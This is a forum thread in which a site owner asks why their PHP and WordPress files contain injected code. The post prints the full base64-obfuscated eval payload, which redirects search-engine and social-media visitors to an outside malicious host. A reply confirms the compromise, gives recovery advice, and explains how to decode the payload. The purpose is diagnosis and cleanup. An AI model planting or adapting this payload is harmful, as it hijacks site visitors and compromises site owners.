Recently I noticed a jquery mobile – php website created was not loading. When I checked the related php files, I could see that some extra characters have gone into the code. The extraneous characters were showing up soon after the tag <?php . What is the reason for it? Is my website hacked? How will I recover all my files? The files are being accessed via control panel login.I could even see that the files outside the website folder, some wp files (wp-config.php,wp-blog-header.php etc) were also containing those extra characters.
This is the malicious code found – <?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI
Someone out there, please advise.
Here is the full code
eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0=”));
To answer the direct question: yes, your site has been hacked.
The
eval(base64_decode(....))is intended to disguise the nature of the code being executed, but it can’t disguise the fact that there is code in your PHP files that does not belong there.As for what the hacked code does, I’m unable to answer that, as you haven’t provided all of it.
I also can’t answer any question as to how they might have got in, but the likelyhood is that somewhere in your system (or in your web hosting company’s system) there is a software package which has a known security flaw.
In most cases, this flaw will have been fixed by the providers of that software, but the version on the hacked site won’t have been updated with the latest fixes, thus giving the hackers an opportunity to get in.
There are other methods to break into a site, but this is by far the most likely.
I can’t tell you which software was used to hack your site; there are too many variables involved, and I don’t know enough about it. I can advise you to make sure that all the software you are responsible for is secure and running the latest versions, and to check with your hosting company to make sure they’re fully up-to-date as well.
You haven’t mentioned WordPress by name, but the files you’ve specified sound like they belong to WordPress. Therefore, recovering the files should be simply a case of updating them back to the original WordPress versions. However, as I say, you should make sure you update to the latest WP version, because it sounds like the version you’ve got is out of date and vulnerable.
The actual data in your pages may have been compromised, but the nature of the hack described, it sounds more like a PHP injection hack, so I would expect that if you get the WP files back to their original state, your pages will be restored. You should check thoroughly, however, to make sure there isn’t anything unexpected still lurking in there.
[EDIT]
Now we have the full code, it’s easy to see what it’s doing: copy the code into a small PHP program, and replace
evalwithprint, so you can see is being run, rather than actually running it. The answer is that it checks that the user isn’t a googlebot or similar, and if not, it redirects the page to a malicious URL.